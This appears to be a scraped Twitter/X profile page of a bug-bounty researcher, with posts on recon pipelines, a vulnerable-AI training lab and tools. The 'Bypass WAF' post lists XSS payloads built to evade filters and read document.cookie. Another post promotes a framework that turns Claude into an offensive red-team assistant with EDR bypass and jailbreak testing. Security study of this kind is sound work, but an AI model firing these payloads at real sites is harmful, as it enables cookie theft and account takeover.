Olivia
Online
sonu chaudhary
@sonuoffsec
MaxLife's Cybersecurity Deputy | Strategist & Red Teamer | Dedicated to safeguarding digital frontiers
Punjab, India
Joined June 2019
301 Following
82 Followers
242 Posts
๐ Open-sourced DVAP (Damn Vulnerable AI Platform)
What if DVWA existed for AI Security?
Learn and test Prompt Injection, RAG Poisoning, MCP Security, Agent Attacks, and AI Red Teaming in a safe local environment.
โญ https://t.co/EQ6kx8T4SO
#OWASP #AISecurity #LLMSecurity
I Found a Critical Vulnerability They Paid Me $15,500
https://t.co/sXKZbsI5eU
โ๏ธ Claude-Red = Offensive Security Skills for Claude AI
A massive open-source framework that transforms Claude into a context-aware red team assistant. ๐ฅ
๐ 100+ offensive security skill modules
๐ Web exploitation
๐ง Active Directory attacks
โ๏ธ Cloud attack paths
๐ก Wireless exploitation
๐ฅ Exploit dev & fuzzing
๐ค AI security testing
Built for:
๐ฏ Bug bounty hunters
๐ก๏ธ Red teamers
๐ฌ Security researchers
๐ CTF players
โ๏ธ Cloud pentesters
Capabilities include:
โ
SQLi / XSS / SSRF / RCE
โ
ADCS / Kerberos / ACL abuse
โ
EDR bypass & shellcode ops
โ
WPA2/WPA3 attacks
โ
OAuth & JWT exploitation
โ
Prompt injection & jailbreak testing
๐ https://t.co/QraHdkdU0A
#RedTeaming #Hacking #CyberThreat #ThreatIntel #Pentest #OpenSource
Cut Burp noise with ThreatLens ๐
Finds IDOR, injections, endpoints & data leaks.
https://t.co/AhWiRFDqV5
#CyberSecurity #Pentesting #BurpSuite #AppSec #InfoSec
Instead of watching a 2-hour movie, watch this masterclass on AI coding and thank me later.
Reported a path traversal in CycloneDX Tool Center caused by untrusted filename handling.
Not production. Not complex.
Still impactful.
๐ Validate & normalize paths
๐ Internal tools are attack surface
๐ โNon-productionโ โ low risk
#DevSecOPs #SBOM
https://t.co/vwVZ0RCG26
IDE for reverse-engineering Android packages
https://t.co/QBpdckhLuZ
You donโt need 20 tabs for recon. You just need a pipe.
Hereโs the one-liner ๐
subfinder โ httpx โ gau โ grep
Turn passive recon into real findings.
From Failure to $32,000: My Bug Bounty Journey
Explore more: https://t.co/VWqpaEk1OQ
https://t.co/Rp2l4KWuiL
New Lines in my repo ! ๐โโฌ
Happy New Year ๐๐
#bugbounty #bugbountytips #recon
๐ My trainings [https://t.co/XCQco1Uimq]
Over 400 recon content pieces, with my tools and tricks!
![ofjaaah's tweet photo. New Lines in my repo ! ๐โโฌ
Happy New Year ๐๐
#bugbounty #bugbountytips #recon
๐ My trainings [https://t.co/XCQco1Uimq]
Over 400 recon content pieces, with my tools and tricks! https://t.co/dtSdrcpyqj](https://pbs.twimg.com/media/G9ly-6TXgAE-Mkc.jpg)
S3 server for local development and testing
https://t.co/PDAufv3zNS
https://t.co/TxcorNELfi
#Infographics
#Offensive_security
Active Directory Pentest Mindmap 2025
https://t.co/aZl6IIHIbB
]-> Source code - https://t.co/lnQhG759h9
Lesser known techniques for large-scale subdomain enum ๐
-https://t.co/zUDa38DzKI
#infosec #cybersec #bugbountyips
Live hunting using bookmark:
>>JS Links
>>Params
>>Subdomain Only
>>Path Relative
>>Path Absolute
#recon #EthicalHacking #BugBounty #jsrecon
Bypass WAF
.
.
"><?/script>"><--<img+src= "><svg/onload?=alert(document.cookie)>> --!>
.
"-->""/>0xr3dhunt</script><deTailS open x=">" ontoggle=(co\u006efirm)``>"
.
"-->""/>0xr3dhunt</script><deTailS open x=">" ontoggle=(co\u006efirm(document.cookie))``>"
#infosec #bugbountytips
tell me any better XSS methodology than this ๐
Explanation:
This oneliner command starts by collecting all URLs from passive sources using gau tool, then filters them for potential XSS parameters using gf patterns. Next, httpx and grep are used to keep only URLs that return specific content types commonly involved in XSS testing. After that, Gxss identifies all reflected parameter URLs. Finally, kxss will filters out URLs where special characters remain unfiltered. prime targets for XSS execution.
Once its done, you can proceed with manual XSS testing or use your preferred automated exploitation tool.
Hey, Hackers ๐๐ป
Here are the OSINT Tools for gathering information and actions forensics ๐
Source: https://t.co/2W5ozgG6v7
#OSINT #infosecurity #Hacking #Pentesting #infosec #BugBounty #bugbountytips #redteam #APT #intelligence #forensics
โ๏ธ REcollapse Technique: Fuzzing the web to bypass validations and discover normalizations in web applications
Blog: https://t.co/Ps8zVgrMop
author: @0xacb
Last Seen Users on Sotwe
Most Popular Users
Elon Musk 
@elonmusk
240.4M followers
Barack Obama
@barackobama
119.3M followers
Donald J. Trump
@realdonaldtrump
111.7M followers
Cristiano Ronaldo
@cristiano
110.1M followers
Narendra Modi
@narendramodi
107M followers
Rihanna
@rihanna
97.6M followers
NASA
@nasa
92.1M followers
Justin Bieber
@justinbieber
90.8M followers
KATY PERRY
@katyperry
87.4M followers
Taylor Swift
@taylorswift13
81.3M followers
Lady Gaga
@ladygaga
72.8M followers
Kim Kardashian
@kimkardashian
69.7M followers
Virat Kohli
@imvkohli
69.5M followers
YouTube
@youtube
68.7M followers
Bill Gates
@billgates
63.7M followers
The Ellen Show
@theellenshow
62.5M followers
Neymar Jr
@neymarjr
62.2M followers
CNN
@cnn
61.9M followers
X
@x
60.8M followers
Selena Gomez
@selenagomez
60.5M followers